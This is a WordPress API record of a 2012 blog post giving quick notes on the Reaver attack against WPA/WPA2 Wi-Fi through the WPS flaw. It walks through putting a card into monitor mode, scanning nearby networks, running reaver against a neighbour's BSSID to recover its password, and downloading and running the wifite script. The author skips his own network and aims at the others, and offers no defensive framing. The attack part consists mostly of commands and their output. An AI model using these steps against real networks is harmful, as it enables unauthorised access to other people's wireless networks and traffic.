{"id":900,"date":"2012-10-20T14:53:52","date_gmt":"2012-10-20T06:53:52","guid":{"rendered":"http:\/\/www.computersolutions.cn\/blog\/?p=900"},"modified":"2012-10-20T18:16:18","modified_gmt":"2012-10-20T10:16:18","slug":"quick-notes-on-reaver-wpa-attack","status":"publish","type":"post","link":"https:\/\/www.computersolutions.cn\/blog\/2012\/10\/quick-notes-on-reaver-wpa-attack\/","title":{"rendered":"Quick notes on Reaver (WPA attack)"},"content":{"rendered":"<p>Assuming all the tools are installed (<a href=\"http:\/\/code.google.com\/p\/reaver-wps\/\">http:\/\/code.google.com\/p\/reaver-wps\/<\/a>)<\/p>\n<p>Reaver is an attack on WPA\/WPA2 using a vulnerability in the WPS mechanism.<\/p>\n<p>First up, we need to find out what our network cards are called, so use iwconfig to list wifi \/ network  interfaces<\/p>\n<p>eg<\/p>\n<p>iwconfig<\/p>\n<p><code>iwconfig<br \/>\nlo        no wireless extensions.<\/p>\n<p>wlan1     IEEE 802.11bgn  Mode:Monitor  Tx-Power=20 dBm<br \/>\n          Retry  long limit:7   RTS thr:off   Fragment thr:off<br \/>\n          Power Management:on<\/p>\n<p>eth0      no wireless extensions.<\/p>\n<p>wlan3     IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm<br \/>\n          Retry  long limit:7   RTS thr:off   Fragment thr:off<br \/>\n          Power Management:on<br \/>\n<\/code><\/p>\n<p>In the above, we have wlan1 and wlan3 as possible interfaces.<\/p>\n<p>Next up, we put the wifi card into monitor mode (pick a card)<br \/>\nHere I&#8217;m using wlan1<\/p>\n<p>airmon-ng start <wifi interface><\/p>\n<p><code>airmon-ng start wlan1<\/p>\n<p>Found 2 processes that could cause trouble.<br \/>\nIf airodump-ng, aireplay-ng or airtun-ng stops working after<br \/>\na short period of time, you may want to kill (some of) them!<\/p>\n<p>PID\tName<br \/>\n1791\tavahi-daemon<br \/>\n1792\tavahi-daemon<\/p>\n<p>Interface\tChipset\t\tDriver<\/p>\n<p>wlan1\t\tUnknown \trt2800usb - [phy0]<br \/>\n\t\t\t\t(monitor mode enabled on mon0)<br \/>\nwlan3\t\tRTL8187 
\trtl8187 - [phy3]<br \/>\n<\/code><\/p>\n<p>That creates another interface (mon0 above), that we can connect to.<br \/>\nNext, we need to list the various wifi LANs in the vicinity.<\/p>\n<p>We can use the new interface to do so (or use any existing wifi interface, it doesn&#8217;t really matter)<\/p>\n<p><code><br \/>\nairodump-ng mon0<\/p>\n<p>CH 13 ][ Elapsed: 20 s ][ 2012-10-20 08:39                                         <\/p>\n<p> BSSID              PWR  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                    <\/p>\n<p> EC:17:2F:F3:0F:A8  -35       21      241    0   7  54e  WPA2 CCMP   PSK  First_Network<br \/>\n 00:18:39:28:3B:2C  -72        9        0    0   5  54 . WPA2 CCMP   PSK  Second_Network<br \/>\n 00:25:BC:8D:4F:F5  -75        5        4    0  11  54e. WPA2 CCMP   PSK  Third_Network                           <\/p>\n<p> BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                          <\/p>\n<p> EC:17:2F:F3:0F:A8  74:E2:F5:4D:C5:11   -1    0e- 0      0        2<br \/>\n EC:17:2F:F3:0F:A8  00:04:20:16:5E:52  -52   48 -54      0       14<br \/>\n EC:17:2F:F3:0F:A8  70:56:81:C2:1B:3B  -66    0e- 1e     0        6<br \/>\n EC:17:2F:F3:0F:A8  00:23:4E:7E:FC:B4  -74    0e- 1      0        3<br \/>\n EC:17:2F:F3:0F:A8  00:08:65:30:93:D3  -76   36 -12e     0      217<br \/>\n<\/code><\/p>\n<p>Here you can see that the interface sees 3 separate networks.<br \/>\nIt can also identify that First_Network has connections from a number of computers.<\/p>\n<p>Ideally, we want to sniff the network with the most traffic; in this case, that&#8217;s my existing network, so we&#8217;ll skip it.<\/p>\n<p>We can see that Second_Network is on channel 5, and Third_Network is on channel 11.<\/p>\n<p>Now we have enough information to try to discover the key for the other networks.<\/p>\n<p>Start up reaver, and connect to a BSSID above:<\/p>\n<p>reaver -i mon0  -b BSSID -a -vv -c 
CHANNEL<\/p>\n<p>BSSIDs &#8211;<br \/>\n00:18:39:28:3B:2C &#8211; Second_Network Channel 5<br \/>\n00:25:BC:8D:4F:F5 &#8211; Third_Network  Channel 11<\/p>\n<p>eg<\/p>\n<p><code><br \/>\nreaver -i mon0 -b 00:25:BC:8D:4F:F5 -vv -a -c11<\/p>\n<p>Reaver v1.4 WiFi Protected Setup Attack Tool<br \/>\nCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com><\/p>\n<p>[+] Switching mon0 to channel 11<br \/>\n[+] Waiting for beacon from 00:25:BC:8D:4F:F5<br \/>\n<\/code><\/p>\n<p>This should connect to the network, and start to do its magic.<\/p>\n<p>If you get issues like<\/p>\n<p>[!] WARNING: Failed to associate with 00:25:BC:8D:4F:F5 (ESSID: Third_Network)<\/p>\n<p>then you need to try another wifi card chipset, as your drivers don&#8217;t support monitor mode correctly.<\/p>\n<p>If it does connect, then you&#8217;re set.  Let it run, and a few hours later, you should see the wifi name and password.<\/p>\n<p>A much easier way to do all this is, of course, to use the prepackaged scripts at<\/p>\n<p><a href=\"http:\/\/code.google.com\/p\/wifite\/\">http:\/\/code.google.com\/p\/wifite\/<\/a><\/p>\n<p>wget -O wifite.py http:\/\/wifite.googlecode.com\/svn\/trunk\/wifite.py<\/p>\n<p>chmod +x wifite.py<\/p>\n<p>.\/wifite.py<\/p>\n<p>Then have fun.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Assuming all the tools are installed (http:\/\/code.google.com\/p\/reaver-wps\/) Reaver is an attack on WPA\/WPA2 using a vulnerability in the WPS mechanism. First up, we need to find out what our network cards are called, so use iwconfig to list wifi \/ network interfaces eg iwconfig iwconfig lo no wireless extensions. 
wlan1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[48,25,4],"tags":[118,427,331],"class_list":["post-900","post","type-post","status-publish","format-standard","hentry","category-exploits","category-technical-mumbo-jumbo","category-useful-info","tag-howto","tag-reaver","tag-wifi"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/comments?post=900"}],"version-history":[{"count":4,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900\/revisions"}],"predecessor-version":[{"id":903,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900\/revisions\/903"}],"wp:attachment":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/media?parent=900"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/categories?post=900"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/tags?post=900"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}